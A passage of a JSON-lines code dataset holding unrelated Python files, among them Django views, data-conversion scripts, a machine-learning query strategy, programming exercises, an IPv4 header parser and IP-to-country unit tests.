context)\n\n\n@login_required\ndef add_event(request):\n departments_list = 
Department.objects.order_by('name')\n if request.method == 'POST':\n form = EventForm(request.POST)\n if form.is_valid():\n event = Event()\n event.subject = request.POST.get('subject')\n event.title = request.POST.get('title')\n event.name = request.POST.get('name')\n event.surname = request.POST.get('surname')\n event.event_date = request.POST.get('event_date') \n event.duration = request.POST.get('duration')\n event.department = get_object_or_404(Department,\n name=request.POST.get('department'))\n event.added_by = request.user.username\n event.save()\n return HttpResponseRedirect(reverse('events:index'))\n else:\n form = EventForm() \n return render(request, 'events/add_event.html', {'form': form, \n 'departments_list':departments_list}) \n\n\ndef user_events(request, username=None):\n if not username:\n username = request.user.username\n departments_list = Department.objects.order_by('name')\n events_list = Event.objects.filter(\n added_by=username).order_by('-event_date')\n context = {'events_list':events_list, \n 'departments_list': departments_list, 'username':username}\n return render(request, 'events/index.html', context)","sub_path":"events/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"398435930","text":"# -*- coding: utf-8 -*-\nimport xlrd\nimport json\n\nhistorical_data = {}\n\nfile_path = './registry_map.xlsx'\nworkbook = xlrd.open_workbook(file_path)\nsheet = workbook.sheet_by_index(0)\nnrows = sheet.nrows\nprint('NUM ROWS', nrows)\n\ndef xls_to_json(startrow, circ):\n\t#print(\"START ROW\",startrow)\n\tdata =[]\n\tfor row in range(startrow, nrows):\n\t\tcell_0 = sheet.cell(row, 0).value\n\t\tcell_1 = sheet.cell(row, 1).value\n\t\tcell_2 = sheet.cell(row, 2).value\n\t\tcell_3 = sheet.cell(row, 3).value\n\t\tcell_4 = sheet.cell(row, 4).value\n\t\tif not cell_0:\n\t\t\tbreak\n\t\tdata.append({\"no\": cell_0,\n\t\t\t\t\t\t\t\t \"reg_area\":cell_1,\n\t\t\t\t\t\t\t\t \"polling_station\":cell_2,\n\t\t\t\t\t\t\t\t \"electors\":cell_3,\n\t\t\t\t\t\t\t\t \"map_url\":cell_4,\n\n\t\t\t\t\t\t\t\t })\n\n\thistorical_data[circ] = data\n\n\t\n\ndef xls_grouping(sheet):\n\tprint('start')\n\t\n\n\tfor row in range(0,nrows):\n\t\tcell_0 = sheet.cell(row, 0).value\n\t\tif 'circonscription' in str(cell_0).lower():\n\t\t\t#print(cell_0)\n\t\t\tcirc = cell_0.split()[1]\n\t\t\txls_to_json( row + 1, circ)\n\n\n\n\n\n\n\n\n\n\nxls_grouping(sheet)\njson_data = json.dumps(historical_data)\nwith open('./registry.json','w') as f:\n\tjson.dump(historical_data, f)\nprint(\"HISTORICAL DATA JSON\", json_data)\n","sub_path":"elections_reg.py","file_name":"elections_reg.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"499737054","text":"import numpy as np\nimport time\nimport torch\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.utils.data import DataLoader\n\nfrom .strategy import Strategy\nfrom model import ResNet18, init_params\n\n\nclass RandomNetworkDistillation(Strategy):\n def __init__(self, X, Y, idxs_lb, net, handler, args, experiment):\n super(RandomNetworkDistillation, self).__init__(X,\n Y,\n idxs_lb,\n net,\n handler,\n args,\n experiment)\n self.predictor_net = ResNet18(in_channels=3).to(self.device)\n self.predictor_state = self.predictor_net.state_dict()\n\n def query(self, n):\n # Freeze classifier weights\n for param in 
self.clf.parameters():\n param.requires_grad = False\n\n # Train predictor on labeled data with target outputs as labels\n self.predictor_net.apply(init_params)\n print(\"Starting Predictor Training on labeled data.\")\n self.train_predictor()\n print(\"Finished training Predictor on labeled data.\")\n\n # Run predictor on unlabeled data with target outputs as labels\n idxs_unlabeled = np.arange(self.n_pool)[~self.idxs_lb]\n # Split the unlabeled 85% train/ 20% holdout test randomly\n k = int(float(len(idxs_unlabeled)) * .85)\n idxs_tmp = np.arange(len(idxs_unlabeled))\n np.random.shuffle(idxs_tmp)\n idxs_rnd_train = idxs_unlabeled[idxs_tmp[:k]]\n idxs_rnd_test = idxs_unlabeled[idxs_tmp[k:]]\n\n scores = self.score_data(self.X[idxs_rnd_train],\n self.X[idxs_rnd_test])\n # Lower scores have lower loss so that sample was more representative\n print(\"Started querying.\")\n scores_sorted, idxs = scores.sort(descending=False)\n\n # Unfreeze classifier weights\n for param in self.clf.parameters():\n param.requires_grad = True\n\n # Return the n unlabeled samples which received highest uncertainty\n return idxs_rnd_train[idxs[:n]]\n\n def score_data(self, X_train, X_test):\n \"\"\"Returns uncertainty scores on giving data.\n \"\"\"\n # Save the predictor's state\n self.predictor_state = self.predictor_net.state_dict()\n\n # Define optimizer and init scores array (output)\n optimizer = optim.SGD(self.predictor_net.parameters(),\n **self.args['distill_optimizer_args'])\n scores = torch.zeros(len(X_train))\n loader_tr = DataLoader(\n self.handler(X_train, np.zeros(len(X_train)),\n transform=self.args['transform']),\n shuffle=True, batch_size=1, drop_last=False)\n loader_te = DataLoader(\n self.handler(X_test, np.zeros(len(X_test)),\n transform=self.args['transform']),\n shuffle=True, batch_size=5000, drop_last=False)\n # Iterate over train data\n for count, (x, _, idx) in enumerate(loader_tr):\n start = time.time()\n # Restore predictor original state\n self.predictor_net.load_state_dict(self.predictor_state)\n # Perform two SGD passes on current data point\n optimizer.zero_grad()\n for _ in range(2):\n x = x.to(self.device)\n _, target_embedding = self.clf(x)\n _, predicted_embedding = self.predictor_net(x)\n loss = F.mse_loss(predicted_embedding, target_embedding)\n loss.backward()\n optimizer.step()\n\n self.predictor_net.eval()\n avg_loss = 0\n # Evaluate loss on \"test data\"\n with torch.no_grad():\n for t, _, _ in loader_te:\n t = t.to(self.device)\n _, target_embedding = self.clf(t)\n _, predicted_embedding = self.predictor_net(t)\n avg_loss += F.mse_loss(predicted_embedding,\n target_embedding).cpu()\n avg_loss /= len(X_test)\n\n scores[idx] = avg_loss # Lower scores are better\n end = time.time()\n print(f\"Scored element {count+1}/{len(loader_tr)} \"\n f\"in {end-start:.2f} seconds.\")\n return scores\n\n def train_predictor(self):\n # Train predictor network on already labeled data\n # First round trains for n_epochs, afterwards trains for less epochs\n n_epoch = self.args['n_epoch']\n\n idxs_train = np.arange(self.n_pool)[self.idxs_lb]\n optimizer = optim.SGD(self.predictor_net.parameters(),\n **self.args['distill_optimizer_args'])\n loader_tr = DataLoader(\n self.handler(self.X[idxs_train], self.Y[idxs_train],\n transform=self.args['transform']),\n shuffle=True, **self.args['loader_tr_args']\n )\n\n for epoch in range(1, n_epoch + 1):\n optimizer.zero_grad()\n self._train_predictor(epoch, loader_tr, optimizer)\n\n def _train_predictor(self, epoch, loader_tr, optimizer):\n 
self.predictor_net.train()\n for batch_idx, (x, _, idxs) in enumerate(loader_tr):\n x = x.to(self.device)\n optimizer.zero_grad()\n _, target_embedding= self.clf(x)\n _, predicted_embedding = self.predictor_net(x)\n loss = F.mse_loss(predicted_embedding, target_embedding)\n loss.backward()\n optimizer.step()\n","sub_path":"query_strategies/random_network_distillation.py","file_name":"random_network_distillation.py","file_ext":"py","file_size_in_byte":5768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"188920935","text":"# 【代码题】\n# 编写函数,计算 0 ~ 100 之间所有数字的累计求和结果,打印到终端里。\n\n\ndef sum_num():\n tamp = 0\n for i in range(0, 101):\n tamp += i\n print(tamp)\n\n\ndef sum_num1():\n count = 0\n tamp = 0\n while count <= 100:\n tamp += count\n count += 1\n print(tamp)\n\n\nif __name__ == '__main__':\n sum_num()\n sum_num1()\n","sub_path":"9月-Python核心编程/python核心编程阶段-python基础/03-function函数/9-14 课后练习函数基础.py","file_name":"9-14 课后练习函数基础.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"367028616","text":"from django.urls import path\nfrom ..views import (\n DayOffListView,\n DayOffCreateView,\n DayOffDeleteView\n)\n\nurlpatterns = [\n path('day-off/', DayOffListView.as_view(), name='days-off'),\n path('day-off/create', DayOffCreateView.as_view(), name='day-off-create'),\n path('day-off//create', DayOffCreateView.as_view(), name='day-off-create'),\n path('day-off//delete', DayOffDeleteView.as_view(), name='day-off-delete'),\n]\n","sub_path":"employees/urls/day_off.py","file_name":"day_off.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"545911064","text":"import os.path, shutil\r\n# from Handbook.readTextFile import readTextFile\r\n\r\ndef readTextFile(filename):\r\n retList = []\r\n infile = open(filename)\r\n for file in infile:\r\n file = file.rstrip()\r\n retList.append(file)\r\n return retList\r\n\r\ndef moveFiles2Dir(fileList, dirname):\r\n srcDir = 'H:/xStuffs/Videos/TubeA'\r\n ''' Move file specified from the filelist to directory dirname '''\r\n for file in fileList:\r\n filename, filedir = file.split('.mp4, ') \r\n srcFilename = os.path.join(srcDir, filedir, filename + '.mp4') \r\n dstFilename = os.path.join(srcDir, dirname, filename + '.mp4')\r\n if os.path.isfile(srcFilename):\r\n print(\"Moving '{}' to destination directory...\".format(srcFilename))\r\n shutil.move(srcFilename, dstFilename)\r\n else:\r\n print(\"*** Info: File '{}' is not found.\".format(srcFilename))\r\n \r\ndef moveFile2Dir(file, dirname):\r\n srcDir = 'H:/xStuffs/Videos/TubeA'\r\n filename, filedir = file.split('.mp4, ') \r\n srcFilename = os.path.join(srcDir, filedir, filename + '.mp4') \r\n dstFilename = os.path.join(srcDir, dirname, filename + '.mp4')\r\n if os.path.isfile(srcFilename):\r\n print(\"Moving '{}' to destination directory...\".format(srcFilename))\r\n shutil.move(srcFilename, dstFilename)\r\n else:\r\n print(\"*** Info: File '{}' is not found.\".format(srcFilename))\r\n\r\ndef main():\r\n# dirname = 'H:/xStuffs/Videos/TubeA/Misc/Single'\r\n dirname = 'G:/Learning Center/Selenium/Automated Web Testing with Selenium with John Sonmez (PluralSight)'\r\n dstname = 'H:/xStuffs/Videos/TubeA/Misc/Singles'\r\n if os.path.isdir(dirname):\r\n for folder, subfolders, files in os.walk(dirname):\r\n print(folder)\r\n if len(subfolders) == 0 and len(files) < 6:\r\n 
print(\"This is a leaf directory which contains less then 6 files\")\r\n for file in files:\r\n srcfile = os.path.join(folder, file)\r\n dstfile = os.path.join(dstname, file)\r\n print(\"Moving '{}' to destination directory...\".format(file))\r\n# shutil.move(srcfile, dstfile)\r\n print(\"Removing directory '{}'...\".format(folder))\r\n# os.rmdir(dirname)\r\n else:\r\n print(\"*** Warning: Directory '{}' does not exist. Aborting...\".format(dirname))\r\nif __name__ == '__main__':main()","sub_path":"PythonEssentials/FolderSync/utility/moveFiles.py","file_name":"moveFiles.py","file_ext":"py","file_size_in_byte":2438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"2719484","text":"import utility as U\nfrom icmp import ICMPHeader\nfrom tcp import TCPHeader\nfrom udp import UDPHeader\n\nclass IPv4Header :\n __protocolTbl = {1: 'icmp', 2: 'igmp', 6: 'tcp', 17: 'udp', 41: 'encap', 89: 'ospf', 132: 'sctp'}\n __nextHeaderTbl = {1: ICMPHeader, 6: TCPHeader, 17: UDPHeader}\n\n def __init__ (self, packetDump) :\n self.header = dict()\n self.header['version'] = 0xf & (packetDump[0] >> 4)\n if (self.header['version'] == 4) : \n self.header['ihl'] = 0xf0 & packetDump[0]\n self.header['dscp'] = 0x3f & (packetDump[1] >> 2)\n self.header['ecn'] = 0x3 & packetDump[1]\n self.header['length'] = U.ListToNum(packetDump[2:4])\n self.header['id'] = U.ListToNum(packetDump[4:6])\n self.header['flags'] = 0x7 & (packetDump[6] >> 5)\n self.header['frag-off'] = U.ListToNum(packetDump[6:8])\n self.header['frag-off'] = 0x1fff & self.header['frag-off']\n self.header['ttl'] = packetDump[8]\n self.header['proto'] = packetDump[9]\n self.header['chk-sum'] = U.ListToNum(packetDump[10:12])\n self.header['srcip'] = IPAddress(packetDump[12:16])\n self.header['dstip'] = IPAddress(packetDump[16:20])\n del packetDump[:20]\n else :\n self.header = None\n\n def __str__ (self) :\n s = \"Internet Protocol v4:\"\n s += (\"\\n {:\"+str(U.labelLength-2)+\"} {:s}\").format(\"Destination IP:\", self.header['dstip'])\n s += (\"\\n {:\"+str(U.labelLength-2)+\"} {:s}\").format(\"Source IP:\", self.header['srcip'])\n s += (\"\\n {:\"+str(U.labelLength-2)+\"} {}\").format(\"DSCP:\", self.header['dscp'])\n s += (\"\\n {:\"+str(U.labelLength-2)+\"} {}\").format(\"ECN:\", self.header['ecn'])\n s += (\"\\n {:\"+str(U.labelLength-2)+\"} {}\").format(\"Total Length:\", self.header['length'])\n s += (\"\\n {:\"+str(U.labelLength-2)+\"} {}\").format(\"Identification:\", self.header['id'])\n s += (\"\\n {:\"+str(U.labelLength-2)+\"} {}\").format(\"Flags:\", self.header['flags'])\n s += (\"\\n {:\"+str(U.labelLength-2)+\"} {}\").format(\"Fragment Offset:\", self.header['flags'])\n s += (\"\\n {:\"+str(U.labelLength-2)+\"} {}\").format(\"TTL:\", self.header['ttl'])\n s += (\"\\n {:\"+str(U.labelLength-2)+\"} {} ({})\").format(\"Protocol:\", self.header['proto'], self.__protocolStr())\n s += (\"\\n {:\"+str(U.labelLength-2)+\"} 0x{:04X}\").format(\"Header Checksum:\", self.header['chk-sum'])\n return s\n\n def __eq__ (self, val) :\n return True if (val is None and self.header is None) else False\n\n def __ne__ (self, val) :\n return False if (val is None and self.header is None) else True\n\n def __protocolStr(self) :\n return self.__protocolTbl[self.header['proto']].upper() if (self.header['proto'] in self.__protocolTbl) else \"Unknown\"\n\n def nextHeader(self, packetDump) :\n return self.__nextHeaderTbl[self.header['proto']](packetDump)\n \n\n\nclass IPAddress :\n def __init__ (self, ip) :\n self.ip 
= [0]*4\n self.update(ip)\n \n def __str__ (self) :\n s = \"{:d}\".format(self.ip[0])\n for i in range(1, 4) :\n s += \".{:d}\".format(self.ip[i])\n return s\n\n def update(self, ip) :\n self.ip = ip\n","sub_path":"ipv4.py","file_name":"ipv4.py","file_ext":"py","file_size_in_byte":3280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"93960721","text":"class Solution:\n def setZeroes(self, matrix):\n m = len(matrix)\n if m == 0:\n return\n n = len(matrix[0])\n first_col = False\n first_row = False\n for i in range(1, m):\n for j in range(1, n):\n if matrix[i][j] == 0:\n matrix[i][0] = 0\n matrix[0][j] = 0\n for i in range(0, m):\n if matrix[i][0] == 0:\n for j in range(1, n):\n matrix[i][j] = 0\n for j in range(0, n):\n if matrix[0][j] == 0:\n for i in range(1, m):\n matrix[i][j] = 0\n\n","sub_path":"73/73.set-matrix-zeroes.661620413.Wrong-Answer.leetcode.python3.py","file_name":"73.set-matrix-zeroes.661620413.Wrong-Answer.leetcode.python3.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"375721905","text":"\"\"\"\nYou are given two positive integers n and k.\nPrint the k-th positive integer that is not divisible by n.\n\nFor example, if n=3, and k=7, then all numbers\nthat are not divisible by 3 are: 1,2,4,5,7,8,10,11,13….\nThe 7-th number among them is 10.\n\"\"\"\n\ndef solve_eff(num, k):\n diff = (k-1) // (num-1)\n return k + diff\n\n\ndef solve(num, k):\n res, cnt = 0, 0\n s = 1\n while cnt != k:\n if s % num != 0:\n cnt += 1\n s += 1\n return s - 1\n\n\nif __name__ == '__main__':\n t = int(input())\n while t > 0:\n nk = input().split()\n number, kth = int(nk[0]), int(nk[1])\n output = solve_eff(number, kth)\n print(output)\n t -= 1\n","sub_path":"contests/1352/1352C-Kth-not-divisible-by-N.py","file_name":"1352C-Kth-not-divisible-by-N.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"643434665","text":"import os\n\nfrom ontology import Ontology\n\nfrom ontology import Ontology\n\nclass GeoOntology(Ontology):\n\n def read_grammars(self, grammar_file):\n grammars = {}\n grammars['cat'] = {}\n grammars['rel'] = {}\n with open(grammar_file) as f:\n for line in f:\n if line.startswith('schema:'):\n line = line[7:].strip()\n parts = line.split('\\t')\n if len(parts) == 2:\n cat = parts[0][4:]\n type0 = parts[1][5:]\n if cat not in grammars['cat']:\n grammars['cat'][cat] = []\n if type0 not in grammars['cat'][cat]:\n grammars['cat'][cat].append(type0)\n elif len(parts) == 3:\n rel = parts[1][4:]\n type1 = parts[0][5:]\n type2 = parts[2][5:]\n if rel not in grammars['rel']:\n grammars['rel'][rel] = []\n if (type1, type2) not in grammars['rel'][rel]:\n grammars['rel'][rel].append((type1, type2))\n return grammars\n\n def is_legal_action_then_read(self, pre_action_class, pre_arg_list, action_token, pre_action, node_dict, type_node_dict,\n entity_node_dict, operation_dict, edge_dict, return_node, db_triple, fun_trace_list, for_controller=True):\n\n return True,\n\n def is_legal_action(self, pre_action_class, pre_arg_list, action_token, pre_action, node_dict, type_node_dict,\n entity_node_dict, operation_dict, edge_dict, return_node, db_triple, fun_trace_list, for_controller=True, entity_lex_map={}):\n if for_controller and not self.use_ontology:\n return True\n if action_token == None or action_token == '' or action_token == '':\n return False\n 
if action_token.startswith('add_unk'):\n return False\n\n print('entity_lex in is_legal_action = %s' % entity_lex_map)\n if action_token.startswith('add_entity_node'):\n entity = action_token[action_token.index(':-:')+3:]\n #print('entity = %s' % entity)\n if entity not in entity_lex_map:\n entity_flag = False\n for entity_key in entity_lex_map:\n entity_value = entity_lex_map[entity_key]\n if entity == entity_value:\n entity_flag = True\n break\n if not entity_flag:\n return False\n\n\n if pre_action_class == 'inner_start':\n type_for_node_map = {}\n\n for node in node_dict:\n type_for_node_map[node] = []\n\n for type_edge in type_node_dict:\n if ':_:' not in type_edge:\n continue\n if not type_edge.startswith('TYPE_'):\n return False\n type_value = type_edge[5:type_edge.index(':_:')]\n if 'arg' not in type_node_dict[type_edge]:\n return False\n arg = type_node_dict[type_edge]['arg'][0]\n if arg not in type_for_node_map:\n return False\n if type_value in type_for_node_map[arg]:\n continue\n if type_value == 'elevation' or type_value == 'len' or \\\n type_value == 'population' or type_value == 'area':\n continue\n type_for_node_map[arg].append(type_value)\n\n for entity in entity_node_dict:\n if not ':=:' in entity:\n continue\n entity_type = entity[entity.index(':=:')+3:]\n if 'arg1' not in entity_node_dict[entity]:\n return False\n arg = entity_node_dict[entity]['arg1']\n if arg not in type_for_node_map:\n return False\n if entity_type not in type_for_node_map[arg]:\n type_for_node_map[arg].append(entity_type)\n\n #print('type_for_node_map: ', type_for_node_map)\n\n for node in type_for_node_map:\n type_size = len(type_for_node_map[node])\n if type_size < 2:\n continue\n for ii in range(type_size-1):\n for jj in range(ii+1, type_size):\n type1 = type_for_node_map[node][ii]\n type2 = type_for_node_map[node][jj]\n #print('type1: ', type1)\n #print('type2: ', type2)\n if type1 in self.grammars['cat'] and type2 in self.grammars['cat']:\n conjoin = set(self.grammars['cat'][type1]) & set(self.grammars['cat'][type2])\n if len(conjoin) == 0:\n return False\n elif type1 in self.grammars['cat']:\n if type2 not in self.grammars['cat'][type1]:\n return False\n elif type2 in self.grammars['cat']:\n if type1 not in self.grammars['cat'][type2]:\n return False\n else:\n return False\n\n for edge in edge_dict:\n if ':_:' not in edge:\n continue\n if 'arg1' not in edge_dict[edge]:\n return False\n if 'arg2' not in edge_dict[edge]:\n return False\n arg1 = edge_dict[edge]['arg1'][0]\n arg2 = edge_dict[edge]['arg2'][0]\n\n if arg1 not in type_for_node_map:\n return False\n if arg2 not in type_for_node_map:\n return False\n\n basic_type_1 = self.get_basic_type_for_node(type_for_node_map, arg1)\n basic_type_2 = self.get_basic_type_for_node(type_for_node_map, arg2)\n edge = edge[1:edge.index(':_:')]\n\n #print('edge: ', edge)\n #print('basic_type_1: ', basic_type_1)\n #print('basic_type_2: ', basic_type_2)\n\n if basic_type_1 == '' or basic_type_2 == '':\n continue\n if edge not in self.grammars['rel']:\n return False\n if (basic_type_1, basic_type_2) not in self.grammars['rel'][edge]:\n return False\n return True\n\n def get_basic_type_for_node(self, type_for_node_map, node):\n if node not in type_for_node_map or len(type_for_node_map[node])==0:\n return ''\n for type_value in type_for_node_map[node]:\n if type_value not in self.grammars['cat']:\n return type_value\n elif len(self.grammars['cat'][type_value]) == 1:\n return self.grammars['cat'][type_value][0]\n elif len(type_for_node_map[node]) > 1:\n 
continue\n elif len(self.grammars['cat'][type_value]) > 1:\n return ''\n else:\n return type_value\n return ''\n\n def get_legal_action_list(self, pre_action_class, pre_arg_list, pre_action, node_dict, type_node_dict, entity_node_dict,\n operation_dict, edge_dict, return_node, db_triple, fun_trace_list, action_all, for_controller=True, entity_lex_map={}):\n legal_action_list = []\n for action_token in action_all:\n legal_flag = self.is_legal_action(pre_action_class, pre_arg_list, action_token, pre_action, node_dict, type_node_dict,\n entity_node_dict, operation_dict, edge_dict, return_node, db_triple, fun_trace_list, entity_lex_map=entity_lex_map)\n if legal_flag:\n legal_action_list.append(True)\n else:\n legal_action_list.append(False)\n return legal_action_list","sub_path":"seq2action_replace/src/py/geoontology.py","file_name":"geoontology.py","file_ext":"py","file_size_in_byte":8142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"274380704","text":"from selenium.webdriver.common.by import By\n\nclass ProductPageLocators():\n page_link = \"http://selenium1py.pythonanywhere.com/catalogue/the-shellcoders-handbook_209/?promo=newYear\"\n ADD_BUTTON_XPATH = (By.XPATH, \"//button[@class = 'btn btn-lg btn-primary btn-add-to-basket']\")\n ADD_MESSAGE_PRODUCT_XPATH = (By.XPATH, \"//div[@class = 'alertinner ']/strong\")\n ADD_MESSAGE_TEXT_XPATH = (By.XPATH, \"//div[@class = 'alertinner ']\")\n ADD_MESSAGE_PRICE_XPATH = (By. XPATH, \"//div[contains(@class, 'alert-info')]/div[@class='alertinner ']//strong\")\n SUCCESS_MESSAGE = (By.XPATH, \"//div[contains(@class, 'alert-success')]\")\n PRODUCT_NAME_XPATH = (By.XPATH, \"//div[@class = 'col-sm-6 product_main']/h1\")\n PRODUCT_PRICE_XPATH = (By.XPATH, \"//div[@class = 'col-sm-6 product_main']/p[@class = 'price_color']\")","sub_path":"Pages/locators.py","file_name":"locators.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"128792482","text":"from __future__ import absolute_import\n\nfrom sentry.models import Team\nfrom sentry.testutils import TestCase\n\n\nclass UserTest(TestCase):\n def test_merge_to(self):\n from_user = self.create_user('foo@example.com')\n from_team = self.create_team(name='foobar', owner=from_user)\n\n to_user = self.create_user('bar@example.com')\n to_team = self.create_team(name='foobaz', owner=to_user)\n\n from_user.merge_to(to_user)\n\n assert Team.objects.filter(owner=from_user).count() == 0\n assert Team.objects.filter(owner=to_user).count() == 2\n","sub_path":"tests/sentry/models/test_user.py","file_name":"test_user.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"489445469","text":"import sys\r\n\r\n\r\n#\r\n## Trie\r\n#\r\n\r\nclass Node:\r\n def __init__(self):\r\n self.children = {}\r\n self.value = None\r\n\r\n\r\ndef find(node, key):\r\n for char in key:\r\n if( char in node.children ):\r\n node = node.children[char]\r\n\r\n else:\r\n return None\r\n return node.value\r\n\r\n\r\ndef insert(root, string, value):\r\n node = root\r\n last_index_char = None\r\n \r\n for char_index, char in enumerate(string):\r\n if( char in node.children ):\r\n node = node.children[char]\r\n else:\r\n last_index_char = char_index\r\n break\r\n\r\n # If there are any nodes to add, append them\r\n if( last_index_char != None ):\r\n for char in string[last_index_char:]:\r\n 
node.children[char] = Node()\r\n node = node.children[char]\r\n\r\n # Store the value in the terminal node\r\n node.value = value\r\n\r\n#\r\n##.\r\n#\r\n\r\ntrie_root = Node()\r\n\r\n\r\n\r\n# Inserting strings from collection to the Trie\r\nstring = input()\r\nvalue = 0\r\n\r\nwhile( string != \"KONIEC KOLEKCJI\" ):\r\n insert(trie_root, string, value)\r\n string = input()\r\n value += 1\r\n\r\n# Checking if given strings are in the Trie\r\n\r\nfor line in sys.stdin:\r\n string = line.rstrip(\"\\n\")\r\n if( find(trie_root, string) != None ):\r\n print(\"TAK\")\r\n else:\r\n print(\"NIE\")\r\n","sub_path":"Trie_Dict.py","file_name":"Trie_Dict.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"541146938","text":"#%%\nimport numpy as np\nimport pandas as pd\nimport geopandas as gpd\nimport os\nimport imageio\nimport numpy.random as npr\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn import metrics\nimport seaborn as sns\nfrom collections import Counter\nimport scipy\nimport matplotlib.pyplot as plt\n\nnpr.seed(3456456)\n\nfilepath = os.getcwd() + \"\\\\IntroDS\\\\week3\\\\HASYv2\\\\\"\n\nhasy_full = pd.read_csv(filepath+'hasy-data-labels.csv')\nhasy = hasy_full.query('70<=symbol_id<=80')\n\n#print(hasy.head(10))\n\npics = []\n\nfor pic in hasy.path:\n #print(pic.replace('/','\\\\'))\n pics.append(imageio.imread(filepath+pic.replace('/', '\\\\')))\n\nlabels = hasy.symbol_id\n\npics = np.asarray(pics)\npics2 = pics[:,:,:,0].reshape(len(pics), 32*32)\nlabels = np.asarray(labels)\n#print(labels)\n\npics2_train, pics2_test, labels_train, labels_test = train_test_split(pics2, labels, test_size=0.2, random_state=0)\nprint(pics2_train.shape)\nprint(labels_train.shape)\n\nlogreg = LogisticRegression()\nlogreg.fit(pics2_train, labels_train)\n\ny_pred = logreg.predict(pics2_test)\n\nprint('Accuracy of logistic regression classifier on test set: {:.2f}'.format(logreg.score(pics2_test, labels_test)))\n\ndef most_common(lst):\n data = Counter(lst)\n return max(lst, key=data.get)\n\nnaive = labels_train\n\nright = 0\nfor i in labels_test:\n val = most_common(naive)\n ind = np.where(naive == val)\n #print(ind[0][0])\n naive = np.delete(naive, ind[0][0], axis=0)\n if i == val:\n right += 1\n\nprint('Accuracy of naive guesses on the test set: ', right/len(labels_test))\n\nconfutse = metrics.confusion_matrix(labels_test, y_pred)\nprint(confutse)\n\n\"\"\" m = confutse.shape[0]\nstrided = np.lib.stride_tricks.as_strided\ns0,s1 = confutse.strides\nout = strided(confutse.ravel()[1:], shape=(m-1,m), strides=(s0+s1,s1)).reshape(m,-1)\nprint(out) \"\"\"\n\nindex = 0\nmisclassifiedIndexes = []\nfor label, predict in zip(labels_test, y_pred):\n if label != predict:\n #print(label, predict)\n misclassifiedIndexes.append(index)\n index +=1\n\nprint(misclassifiedIndexes)\n\nplt.figure(figsize=(20,4))\nfor plotIndex, badIndex in enumerate(misclassifiedIndexes[0:5]):\n plt.subplot(1, 5, plotIndex + 1)\n plt.imshow(np.reshape(pics2_test[badIndex], (32,32)), cmap=plt.cm.gray)\n plt.title('Predicted: {}, Actual: {}'.format(y_pred[badIndex], labels_test[badIndex]), fontsize = 15)\n plt.show()","sub_path":"IntroDS/week3/week32.py","file_name":"week32.py","file_ext":"py","file_size_in_byte":2419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"501569174","text":"# Author:\n# Loic Gouarin \n#\n# License: 
BSD 3 clause\n\"\"\"\nIntegration of a cubic spline.\n\"\"\"\nfrom __future__ import print_function, division, absolute_import\nimport numpy as np\n\ndef splint(xs, ys, y2s, x, y):\n    \"\"\"\n    Evaluate a sample on a cubic spline.\n\n    Parameters\n    ----------\n    xs\n        The x coordinates of the cubic spline.\n    ys\n        The y coordinates of the cubic spline.\n    y2s\n        The second derivative of the cubic spline.\n    x\n        The sample points where to evaluate the cubic spline.\n    y\n        The y coordinates of the sample.\n\n    See also\n    --------\n    splinart.spline.spline\n\n    \"\"\"\n    khi = np.searchsorted(xs, x)\n    klo = khi-1\n    step = xs[khi] - xs[klo]\n    x_right = ((xs[khi]-x)/step)\n    x_left = ((x-xs[klo])/step)\n\n    if y.ndim == 2:\n        step = step[:, np.newaxis]\n        x_right = x_right[:, np.newaxis]\n        x_left = x_left[:, np.newaxis]\n\n    y[:] = x_right*ys[klo]+x_left*ys[khi]+(\n        (x_right**3-x_right)*y2s[klo]+\n        (x_left**3-x_left)*y2s[khi])*step**2/6\n","sub_path":"splinart/spline/splint.py","file_name":"splint.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"450371441","text":"import unittest\r\nimport iptocc\r\nimport ipaddress\r\n\r\nclass TestSearchDatabase(unittest.TestCase):\r\n    def test_get_country_code(self):\r\n        # Test valid US ipv4\r\n        ipv4String = \"5.35.192.0\"\r\n        country_code = iptocc.get_country_code(ipv4String)\r\n        self.assertEqual(country_code, \"US\")\r\n\r\n        # Test valid SE ipv4\r\n        ipv4String = \"5.35.184.0\"\r\n        country_code = iptocc.get_country_code(ipv4String)\r\n        self.assertEqual(country_code, \"SE\")\r\n\r\n        # Test valid US ipv6\r\n        ipv6String = \"2a00:5440:0000:0000:0000:ff00:0042:8329\"\r\n        country_code = iptocc.get_country_code(ipv6String)\r\n        self.assertEqual(country_code, \"US\")\r\n\r\n        # Test valid GB ipv6\r\n        ipv6String = \"2a00:95e0:0000:0000:0000:ff00:0042:8329\"\r\n        country_code = iptocc.get_country_code(ipv6String)\r\n        self.assertEqual(country_code, 